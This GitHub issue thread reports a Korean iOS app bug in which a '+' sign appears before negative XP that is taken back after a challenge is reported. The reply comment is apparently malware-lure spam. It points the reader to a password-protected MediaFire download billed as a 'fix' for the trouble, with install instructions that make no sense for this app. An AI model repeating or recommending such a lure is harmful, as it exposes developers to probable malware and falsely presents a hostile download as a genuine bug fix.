### ISSUE TITLE
[Bug] 신고된 챌린지 경험치 표시에 "+" 제거

### ISSUE THREAD

**Issue by HIBAR97** [TeamFair/ILSANG-iOS#130]
## ⚠️ 버그 설명
XP에 "-"를 포함해서 들어오는 경우, UI에 "+"를 표시하지 않도록 처리
  

## 📑 재현 방법
챌린지 신고로 인한 XP 회수시 표시가 "+"를 포함하는 버그

## 📱 스크린샷(optional)
![image](https://github.com/user-attachments/assets/b9d9b3c5-2311-4fc9-ac24-7ee3c915baa7)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
